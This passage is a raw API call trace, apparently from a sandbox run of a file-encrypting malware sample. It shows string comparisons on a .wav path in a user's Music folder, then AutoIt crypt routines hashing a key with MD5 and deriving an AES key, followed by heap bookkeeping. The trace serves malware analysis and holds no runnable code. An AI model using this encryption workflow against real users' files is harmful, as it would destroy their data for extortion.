lpString1="L3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zhuo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="huo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uo4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eGfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GfFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fFOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FOaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oaa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aa4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WWUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WUbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UbMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bMhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MhmKz.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.262] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.262] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0186.262] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0186.263] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.263] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.263] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.263] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.263] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.263] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.263] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe5ec70, ftCreationTime.dwHighDateTime=0x1d5d8d9, ftLastAccessTime.dwLowDateTime=0xa5315d20, ftLastAccessTime.dwHighDateTime=0x1d5e38c, ftLastWriteTime.dwLowDateTime=0xa5315d20, ftLastWriteTime.dwHighDateTime=0x1d5e38c, nFileSizeHigh=0x0, nFileSizeLow=0x8f92, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="WWUbMhmKz.wav", cAlternateFileName="WWUBMH~1.WAV")) returned 0x90af58 [0186.263] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0186.264] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.264] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.264] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.264] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.264] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0186.264] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.264] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0186.264] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.264] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.265] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0186.265] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.265] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.265] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.265] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.265] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.265] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0186.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.265] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0186.266] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.266] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.267] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0186.267] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.267] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.267] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.267] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.267] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.267] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.267] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.267] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.267] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.267] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.267] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.267] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.267] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0186.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.268] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.268] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.268] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.268] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0186.268] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.268] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.268] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.268] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.268] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.268] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.269] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.269] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.269] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.269] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.269] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.269] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0186.269] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.269] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.269] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.274] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.274] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0186.274] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.274] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.274] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.274] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.274] CryptHashData (hHash=0x90ae18, pbData=0x8debf0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0186.274] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.274] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.274] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.274] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.274] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.274] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.274] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.274] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0186.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0186.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0186.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0186.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0186.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0186.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0186.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0186.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0186.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0186.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0186.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0186.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0186.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0186.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0186.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0186.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0186.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0186.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0186.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0186.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0186.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0186.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0186.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0186.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0186.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0186.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0186.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0186.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0186.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0186.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0186.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0186.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0186.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0186.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0186.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0186.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0186.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0186.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: 